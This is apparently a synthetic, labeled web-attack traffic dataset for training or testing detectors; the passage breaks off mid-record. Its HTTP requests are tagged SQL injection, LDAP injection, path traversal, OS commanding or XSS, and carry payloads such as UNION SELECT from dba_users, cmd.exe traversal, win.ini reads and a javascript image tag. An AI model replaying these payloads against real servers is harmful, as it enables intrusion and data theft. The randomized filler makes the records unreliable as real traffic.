Connection: rqo1e4ab
Accept: video/mpeg;q=0.7
Accept-Charset: *
Accept-Encoding: gzip, compress, compress
Accept-Language: wAp6t-tgwiasg, sunahs-erOor9u, 8snqoa-rn
Cache-Control: min-fresh=37265
Client-ip: 126.60.242.180
Cookie: nlNa=2;3eadgvhoat7=hSottewhereat>ahstyle0nHyk\;mwnrutmr3onbi=9;ynaaha99i4tr=isiTnseeeap
Cookie2: $Version="228"
Date: Wed, 15 Apr 09 22:14:45 CET
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: yko0aa0@wnoagzEgT.de
If-Modified-Since: Tue, 01 Dec 09 02:41:06 CET
If-Unmodified-Since: Tue, 23 Jan 07 09:41:21 UTC
If-Match: "P965WHfPF_WavaNXnzTe"
If-None-Match: "dH9H.DIJE9oxAbgdUuh"
If-Range: Fri, 28 Aug 09 12:25:19 UTC
Max-Forwards: 8
MIME-Version: 3.0
Pragma: tEuw3rat=bwesren9
Proxy-Authorization: NTLM cHNicHlsZWVkd2J1bjM0aHFpdGR0SWNveTFzZGxFRnpkMHRqYW8=
Authorization: Digest nonce
Range: -9,25-34306,2-799
Referer: http://www.isdeHel.net/d1eipy/n06hzrs1/lrmvcou/anemue/oegsehre.php4
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.3 (compatible; MSIE 4.8; Win 9x; bganthOn; deNtn5; 8uela)
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/0.3 www.rhwat.gif, 4.0 www.8ds5mig.css
Transfer-Encoding: eaylde
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36032
Start - Id: 41565
class: SqlInjection
GET /sRqkpdIOVyqzmJ9EQ6./3hIdmeahhrsatrejs/isuGe4/hFPQ6o5fJV3i/n6pyMQm./sibgsound.libjd_P/o8hoeHDLbt1/n0mB.g30.WX.exe?cTtsr=chairs%27++++UNION++SELECT+++++mveo7tt+++FROM+++++dba_users+++++WHERE++++name++like++%27%2525&trtdtdtt=%3AdTe&autTktaef=4+eqKiunione%5C&1Lioibpydrgce3=tnateg71eqlog&rjin4ssi=lh%5Daccept%3Fn09admpny&esaoriherelo=h2OvXdiXx&2LXVYHAX=nGircEn%29&tt4pY=nemDngu&LP5XQ7zJrcpkv5=ti%40t&lthoSiupyiu=child5ee2uh2hn&ak=sTfXMWE HTTP/1.0
Host: 169.106.179.42
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 22.16.9.166
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="102"
Date: Wed, 31 Mar 04 10:29:32 GMT
Expect: oAcs=EcpeLe
From: usaacy07@scsi6.be
If-Modified-Since: Wed, 30 Sep 09 23:01:20 CET
If-Unmodified-Since: Thu, 07 Jan 10 16:27:42 CET
If-Match: *
If-None-Match: "8WENARQdVZLlky.6w"
If-Range: *
Max-Forwards: 046
MIME-Version: 3.9
Pragma: 1n=tn
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM ZHRlYWxlb2NlemlhdHNZN3JhYW9hbXdsMGtvY2tyb2RhdTVudElEbXF0
Range: 629953-,-3
Referer: http://nnJlgna.cz/esososo/djepaWen/tyshxhw.swf
TE: trailers,gzip,chunked
Trailer: If-Range
User-Agent: rhrr/4.8.1.6.3
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/9.9 181.191.40.93, 9.3 243.126.203.94
Transfer-Encoding: tuEad; aeweT3es=A5neta
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41565
Start - Id: 38600
class: LdapInjection
GET /tyvHP/EHIurGPbdHH7UZW/uiwg3nq3ets/eDfkQj5I1Gszc2qsbK6/hyuobyiNoN/5rgvohashtq/riST_zn/lfeoae8roinhiu4ttsr/T4slstEnEoes3/ra7a/P2eengbsRkyia/iCsixkh.sh?twiDTmEq=%29+%28+++%7C+++%28aaec%3Dedra*%29&c2leeP0h=z6REurTJ&ruy=%3EeNtnhisdeleteibe&9fcetyez=teisb&ioktnirnsrnvws=ox%29re3fsanf&fei7oorp=wFjA%40Usj&7ad9sAutu=sqze0&egu=oiet+%3Ah%3Cqde&Wusrinput0y-XHR=tinWeniedy&s8inyse3sr=961853&iKw4bmssaxshBr=12722&unzdbbn=3578754&shroXglur=%2Ba-s8&nXat=466&akspootw7EE=nTF HTTP/1.0
Host: www.winTo5.fr:2
Connection: close
Accept: application/postscript;q=0.8, audio/*, text/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: min-fresh=0
Client-ip: 47.85.156.197
Cookie: MtmpFtelnetAJ7b3Uecho=9aas;tct=p%cxmlas ;nOMHwdefaacnpx=4nDL694Y0;eEg0aa=58;U8npC=iaschAmStuiak
Cookie2: $Version="7"
Date: Mon, 20 Sep 04 01:26:31 GMT
ETag: W/"1BC0q5Z63GcBA0j"
Expect: 0saert
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 05 Mar 10 21:06:24 CET
If-Unmodified-Since: Mon, 24 May 04 23:58:04 UTC
If-Match: "bV571v-3Ly.hYO5fI5eK"
If-None-Match: "N4IiCKMLXmw-kUZ4Vv"
If-Range: Thu, 20 Jul 06 06:10:57 UTC
Max-Forwards: 0321
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic dHQwaXJhZTpEcmVh
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: http://www.atid.cz/m9hn/3sRhE.jpg
TE: deflate
Trailer: Range
User-Agent: Mozilla/9.1 (Windows; U; Win98 1.7; wa-ie; rv:1.9.9) Gecko/31471726
UA-CPU: Sparc
UA-Disp: 7529,000,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 623x8485
Via: da8yvH/0.6 138.246.109.48
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 548 www.Aup9tn.css "jido14iihrlea" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38600
Start - Id: 36187
class: PathTransversal
PUT /b9.hwTcIpbYf_VaBF3z/rfTOe8_O/hBMQ35TrqQkDhxf.css? HTTP/1.1
Content-Length: 306
Content-Language: ese
Content-Encoding: identity
Content-Location: /VAtgcc/weyFbr.jsp
Content-MD5: c3M1aTFieG9tb3R1NHRubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 17 Mar 09 09:44:56 GMT
Last-Modified: Mon, 10 Aug 09 04:24:06 CET
Host: www.wZjaw.gov
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1251, iso-8859-9, windows-1250, windows-1255, windows-1257
Accept-Encoding: compress;q=0.8, gzip;q=0.3
Accept-Language: n:\\WINNT\\win.ini
Cache-Control: no-transform
Client-ip: 220.235.100.136
Cookie: noin6ohyi2=asTqi;sn=aeesuiwr1nsfo;kpq2=hi;VN4Joptc3U=BiresrdeIwttot;eedO=7319
Date: Mon, 12 Feb 07 12:48:33 UTC
ETag: "eGwBaRA24wjBRT_nUC"
Expect: nthoiP=wlyg9hri
From: 5uhy@ih5iar.uk
If-Modified-Since: Sat, 21 Jan 06 23:51:35 GMT
If-Unmodified-Since: Sat, 24 Jan 04 05:46:43 CET
If-Match: "ACNuRQA@pgCWemcm"
If-None-Match: "4OET0dJ8kHPvlrk"
If-Range: Fri, 14 Jan 05 11:26:55 GMT
Max-Forwards: 758
MIME-Version: 2.6
Pragma: aneQa='uvuhrd'
Authorization: fs3mas yynattw=lroh
Referer: http://ReCuHdym.de/rkia/snt0eep/saoc/qteo.swf
Trailer: If-Unmodified-Since
User-Agent: kYYDjrbK. http://www.tpbs.ch
Via: 8.4 www.send.tiff, 5.1 137.57.99.49
Transfer-Encoding: identity
----: -------------------------

VmFcaccess_logm6x=(eInhetcS&oirt6=eooZc&nrahs=tmrib2riO4tshs&rhrAIrjxdeorh=5jlii9nEr&sn3anwtjtr=ss4DkRG@md_g&fieydnmH13mhe5l=6&aj=aev8ioE&n28euS2rdu= cOhiem0e&hdogvewphonon=n@3@l&aq=- m&a4nfiosissopstG=sSZSxw&sspdoleed=wz.16&DKMY7.rbP=noLhstyleacceptTetuz)oet46he&DercG1insertL=141309&eh=08106696

End - Id: 36187
Start - Id: 45236
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: 134.141.214.31
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 83.132.12.183
Cookie: 79Tinputboot.ini2P=pNX0Fwh2Dsw;s1mrpxihnzeejos=6;hdnToohs=mu7ZE;AhsEa=e
Cookie2: $Version="8"
Date: Fri, 17 Mar 06 04:49:41 UTC
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: eterw=afhcvs7t
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Sat, 12 Sep 09 10:16:37 GMT
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: *
Max-Forwards: 62
MIME-Version: 3.6
Pragma: y=gr
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM c2N0cDN5bHRtcWlydG9hbW43M2RidHU3dHh3bmFlbzZ0RVJscjhrbjVsZG5jYmM=
Range: 220-5761,42620-
Referer: http://oEorf.cz/awos/nfhe/io2Hhjx.fgf
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: Mozilla/7.6 (X11; U; Open BSD i386 8.3; tt-oE; rv:7.0.8) Gecko/75281520
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/3.9 www.ee60tcs.shtml
Transfer-Encoding: deflate
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45236
Start - Id: 41258
class: SqlInjection
GET /oX.HgkIon.htm?tyce5q=9883706709&leSnv2dcitm5=nmtei+r&peuter=tdple0eazs&fa3=uUtr&sn2htx=DeEpvtrz&gbelnu=sjVsLeEXEyv4&dqXehet=4b HTTP/1.1
Host: www.5hpSmgsa.com
Connection: 2sea2l
Accept: */*
Accept-Charset: x-mac-roman;q=0.9, windows-1253, iso-8859-5
Accept-Encoding: compress, compress, compress;q=0.1, gzip
Accept-Language: nwEotute-nrl3o2c;q=0.9, ezAw-Ts, hotf-th;q=0.1, spms2-fos;q=0.2, ons85l-m7dx
Cache-Control: max-age=20353
Client-ip: 102.193.65.233
Cookie: eaauqe3icega5=' AND USER_NAME()='jo9ew
Cookie2: $Version="6"
Date: Thu, 15 Apr 04 03:36:06 UTC
Expect: 100-continue
If-Modified-Since: Sun, 17 Jun 07 14:34:54 GMT
If-Unmodified-Since: Mon, 12 Dec 05 02:18:38 GMT
If-Match: "WHhJprvyf@JHzCUct"
If-None-Match: "rzcC2zKFJaxDYOY"
If-Range: *
Max-Forwards: 22
MIME-Version: 2.9
Proxy-Authorization: NTLM UlNsdGFGNWFhRTlwZTRkYWdJcndyMmVudG9lYW90TnVoam9mM2lubnRvbQ==
Authorization: Basic bEVoaG9EOng0cGU=
Referer: /LitG/aecNdn/0awtspct/pbi7/reeyv.gz
TE: trailers
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 8.1; me-On; rv:7.4.6) Gecko/82934092
Via: 8.4 165.79.54.110
Upgrade: uaiiie/9.7, uslvel/1.2, jlr/9.6, aowern/5.3, alax/3.9
X-Serial-Number: 658300192626
~~~~~: ~~~~~~~~~~

null

End - Id: 41258
Start - Id: 43716
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.cNFfboj.cz:80
Connection: eielT
Accept: image/*, video/*, image/*
Accept-Charset: koi8-r, x-mac-turkish;q=0.1, windows-1255, windows-1252;q=0.9, windows-1253;q=0.2
Accept-Encoding: 
Accept-Language: t-enuh, 4h-xnyfa, drHs-o5nlvdld
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Thu, 22 Nov 07 17:43:02 UTC
ETag: "WuqeTiXQlvgbu6xrYI"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Tue, 01 May 07 20:25:46 GMT
If-Unmodified-Since: Mon, 15 Aug 05 11:46:01 CET
If-Match: "AlB4eIMJ0xxL.GO"
If-None-Match: *
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: haw3tnnu='g8e6wutu'
Proxy-Authorization: NTLM ZW5rZWVzZTBwY0l1aDdsbHdBMmxhT2VhT2FhNmNkeHRhd2U3bjQ=
Authorization: NTLM ZW1kb0d0cnl6dGV0YUF0aXJlaGxNZW9zdXNFaWViRGlu
Range: 7008-71
Referer: /ncup7y/edia.wmn
TE: gzip,deflate
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 4.5; nE-tn; rv:2.0.1) Gecko/77978447
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 4ie/3.2 19.170.182.11, 7.3 60.63.115.197
Transfer-Encoding: mnnhta
Upgrade: fnetaM/4.9, l3e/1.2
Warning: 546 161.55.81.201 "zehnaoi8Htrab7epa" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43716
Start - Id: 47148
class: XSS
GET /cDs0vx3VSv-8/a_BvjG1k_/eecfQVsmda/i9rh.gif?FBtZSse=%3Cimg++++dynsrc+%3D+++%22javascript%3A%5Balert+%28%27ediba%27%29%3B%5D++%22%3E HTTP/1.1
Host: 241.23.240.167
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: min-fresh=2
Client-ip: 21.241.180.143
Cookie: sVd=c56tt;nivvrdoo=0;pelioteU=9106341840
Cookie2: $Version="5"
Date: Sun, 03 Aug 08 11:45:46 GMT
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: tnrpsa=tPsspxH
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Wed, 14 Jun 06 10:29:41 UTC
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: "jJzAUVFXaY6WV9J_Gu"
Max-Forwards: 2
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aXVkZFQ6dUxsMTZi
Range: 9848-585788,73810-,9-
Referer: http://www.esNAi.be/tnee2/eremoeo/dMthdivl/HeMsaod/6ele.png
TE: trailers,gzip,chunked;q=0.0
Trailer: Cache-Control
User-Agent: stka8 (o8woS.4K; rADDaketQK; s_vhzVBX@; hwTfJXnLe; lvblPeX1G)
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: FTP/5.5 www.e5pe.shtml
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47148
Start - Id: 43795
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.lxSofjhs.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1258;q=0.2, x-mac-ce, x-mac-korean;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=3
Client-ip: 50.135.195.138
Cookie: oMHM=a2ein so;yieuxaris4Ai=04112;etwdxoeheim1=hcioo;7oApdmstAkf=i64;dtgH1oRiseisaih=+<;1nQkz=30
Cookie2: $Version="3"
Date: Mon, 02 Jun 08 18:00:52 CET
ETag: W/"4KSEhJLGbnGFZx@@ZY"
Expect: xgyAf=lerteel5;oxouvLO
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 26 Jun 09 02:26:36 UTC
If-Unmodified-Since: Thu, 09 Mar 06 09:52:20 GMT
If-Match: "lMhgnHGdOr8gJezEp5s"
If-None-Match: "NLC1kQ4611zfCMdym"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 9835
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: NTLM cnRlMkRrcmZjdnBpaU91YWRkbmVhYWdyaWkxdGFlYW1z
Range: 904036-,02113-35,44499-
Referer: http://www.ngvb3iq.uk/d5ee/airot/essagkr/kzstiztt.pdf
TE: chunked,trailers
Trailer: Pragma
User-Agent: eqja3Tynn (oE2@TnLs)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: HTTP/6.6 194.62.111.66, 2.7 www.O8slse.png:617, 1.8 75.91.46.54
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43795
Start - Id: 36522
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: 198.32.20.44
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ieaeS-tgjm7c
Cache-Control: max-age=34079
Client-ip: 65.215.179.86
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="016"
Date: Wed, 15 Jun 05 05:03:30 CET
ETag: W/".7UtDqLlCOhLK.z"
Expect: 100-continue
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Fri, 15 Oct 04 08:23:47 CET
If-Unmodified-Since: Wed, 30 Aug 06 17:29:18 UTC
If-Match: "3OF@B6v2RpG-mDdi@_BQ"
If-None-Match: "Z-DYOiZ.iK-wTpj1"
If-Range: *
Max-Forwards: 34
MIME-Version: 8.5
Pragma: hsibt=armraue
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM d3Jtb3RpbmVzY240ZWkwb09sYWhvYVRlcm5wZHRseWhlOGk=
Range: 17-
Referer: http://www.sxdscE.fr/a5eo/i5nngy/evw9wsT.cgi
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: foeme9Ofh (lCiZ1Z9oY)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9877x8489
Via: 3.0 www.asSaxetn.gif, 3.5 221.229.147.43
Transfer-Encoding: deflate
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36522
Start - Id: 37801
class: LdapInjection
GET /c7s9Ypvk8oZwC7Jq/snLuoli/sXMmF8hy3@2gc/yaotof/jnpqJwxH/r3j6GG2Z9dh6Sc/hLz2.aspx?a6=tlkaenshC&5aetfnEe=21239630&w4ee=3423170&wtlukwn=67776&rleyo48aol=a_T7ozxo&j4MK=osod&oCTyEiyxeitftzr=+dXLrdwa3c&hb=bineo+eywthst+%7E%29g%25&dwwera=Ee3+etjerNv&UbodyChyjI7mLLor=itI5wlsrH2v&eahgmfth=%29+++%28++%7C%28rtn%3Dnd*%29 HTTP/1.1
Host: www.5esorojI.ch:51
Connection: alstit
Accept: */*
Accept-Charset: cp-950;q=0.7, koi8-r;q=0.1, x-mac-turkish, euc-jp;q=0.8, gb2312
Accept-Encoding: identity, gzip;q=0.9
Accept-Language: *;q=0.7
Cache-Control: max-stale=5454
Client-ip: 148.220.0.143
Cookie: netcat@qUl.@NNechoM=20470511;vneejtttwcow=766488481
Cookie2: $Version="7"
Date: Tue, 10 Jun 08 16:43:00 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 14 Aug 08 04:35:45 CET
If-Match: *
If-None-Match: "Zcce8fjmgI08heW"
If-Range: Sat, 19 Nov 05 09:15:53 GMT
Max-Forwards: 2
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest nc=bC8DDEDe
Range: -1,56487-
Referer: http://www.dmoosd.be/etenrcwa/eati/jeuptsse/mEpmh7T.html
TE: gzip,gzip;q=0.6,gzip
Trailer: If-Range
User-Agent: ieeFl08mt
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/3.5 www.ioonetA.gif:97447
Transfer-Encoding: identity
Upgrade: rasu/0.8, teies/0.4, nSn4/5.5, rceyaa/2.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37801
Start - Id: 36828
class: OsCommanding
GET /anu/ilanliooti9jdduoujE/w3nu0orsssool3s/gIformdBpassthrusK6KxF/hat/tRdd0ciOe29azotl9r3/g4hlib02wF4.qhavingEcY/4b2/d3OZ.l/Ekedvamvo/R6gU9./in.asp?8Afonshiet52wde=having%28n&sso7enndn=lnN&wVg03Xq3C@=tits&enle6ii=l-&5nno2s0ift0i=oxox&eatviufy7iOohI=%5Cnls+++%2Froot%2F&jrstHbeILi=ni&CG.Gwp-=do+l&I5hEbnftbsmt=e7dho HTTP/1.1
Host: www.p6rggtnntw.gov:74
Connection: 6ath
Accept: */*
Accept-Charset: windows-1252;q=0.6
Accept-Encoding: 
Accept-Language: n-za5rc;q=0.4, tauetto-te;q=0.1, iei-qya, c4huit-toTm
Cache-Control: no-transform
Client-ip: 235.194.232.93
Cookie: fjN8_kfwhereol3=enl;trdhiluhfl=zXVWpXlyus;aX5i=scriptruk;rpryrr=95ctzoc;VQdropesU4ITIn6=7
Cookie2: $Version="595"
Date: Fri, 16 Apr 04 14:31:28 GMT
ETag: W/"i6x-WlD5WMkH-K3"
Expect: txirnoe=mMPu;seI4y
From: aPre@Ehts2SDd.ch
If-Modified-Since: Sat, 13 Dec 08 24:01:06 GMT
If-Unmodified-Since: Sun, 05 Mar 06 09:28:23 GMT
If-Match: "n.CE2kTDFzrh4OKlriw"
If-None-Match: *
If-Range: *
Max-Forwards: 52
MIME-Version: 3.6
Pragma: me8t=dOx
Proxy-Authorization: Basic YWk5cmk6YWV5VnRLZWU=
Authorization: Basic dGl0bDphcmlz
Range: -088,-478,8-
Referer: /fk4sritt/yvomerfl.php4
TE: gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 1.0; hm-rv; rv:3.5.5) Gecko/29528475
UA-CPU: 68000
UA-Disp: 3174,538,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 5.1 www.mh2Gyc.gif
Transfer-Encoding: compress
Upgrade: miiht/0.4
Warning: 917 63.115.145.135 "Ohgd7" 
X-Serial-Number: 076281973736224985
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36828
Start - Id: 43462
class: OsCommanding
GET /TrnnhehcmMubW/3rhr/nH878Th.tiff?at=%5Cn++uftp+++++-p++++www.trma.com+%2Ftendan%2Fnsge%2Fse%2Fieve%2Fie%2Fstenti HTTP/1.1
Host: www.HAhiqvon.net
Connection: close
Accept: text/*, image/*
Accept-Charset: x-mac-arabic;q=0.9, iso-8859-8-i;q=0.4
Accept-Encoding: deflate, identity;q=0.4, identity;q=0.4, deflate;q=0.7, compress;q=0.8
Accept-Language: *
Cache-Control: f5dtx='nwlN'
Client-ip: 21.205.240.147
Cookie: qic8onrtn9ntav=rFj3a
Cookie2: $Version="5"
Date: Thu, 20 Jan 05 13:52:39 UTC
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Fri, 15 May 09 13:44:44 UTC
If-Unmodified-Since: Sat, 02 Dec 06 17:23:50 GMT
If-Match: "DoLfngbAg@dIMUqZ01a"
If-None-Match: "GLdG6pLzdOZyWbSZd@nK"
If-Range: Sat, 25 Mar 06 11:34:09 GMT
Max-Forwards: 37
MIME-Version: 6.8
Pragma: no-cache
Authorization: tUmcn a4hk=n4Iui
Referer: /iegitl/qdattt/lqavo.asmx
TE: gzip;q=0.2
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 4.1; is-mm; rv:6.5.2) Gecko/32336382
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43462
Start - Id: 44922
class: PathTransversal
GET /I2_kJAV4tJVH-Y/jJHnRA3QbW8.kW5YDg/qlNphpZrFbetweenluvG/WN.asp?cs=60042&IQQRNmBGD=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&flant=400 HTTP/1.0
Host: 235.151.105.213
Connection: close
Accept: video/*, application/*;q=0.8, image/*
Accept-Charset: big5;q=0.8, x-mac-icelandic;q=0.1, utf-8;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 156.228.249.233
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="546"
Date: Thu, 30 Jun 05 13:46:40 GMT
ETag: "s3X2xyY4nbloQUM2pt6"
Expect: 100-continue
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Wed, 11 Aug 04 15:21:35 UTC
If-Unmodified-Since: Sat, 27 Dec 08 18:45:46 UTC
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: "6xpfW36nUADdQQF-TaK"
If-Range: Sat, 26 Dec 09 22:00:24 UTC
Max-Forwards: 8599
MIME-Version: 6.2
Pragma: tudElp1=sa6oeFe
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: Basic ZU5pcDpibmVzcA==
Range: 50635-77
Referer: /k09hnguf/rYnry.conf
TE: trailers
Trailer: Accept-Encoding
User-Agent: qi4rimdjerpsnon
UA-CPU: StrongARM
UA-Disp: 714,744,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 5.9 www.hhequr.tiff, 4.9 126.126.41.176, 7.1 www.ststy.tiff
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 640 197.125.93.67 "pyiaiihnet7qbt" "Wed, 01 Apr 09 17:31:52 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44922
Start - Id: 38083
class: LdapInjection
GET /ww/rrEeaampLr7/Kq.php?7dcoatoloei=aHdO&oSsrcieWK=lue%3F%3D&zetOnG2ktae=1696&aeysvplerccn6ps=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&h1soerjdtelDp=+&oe4agaWorositk=ku%7CLrhm%3A&O4tmpGQ=nYQS&XeRGyE=hdevbscriptikg HTTP/1.0
Host: www.axheBys.uk:7842
Connection: close
Accept: text/*;q=0.6, text/*;q=0.0
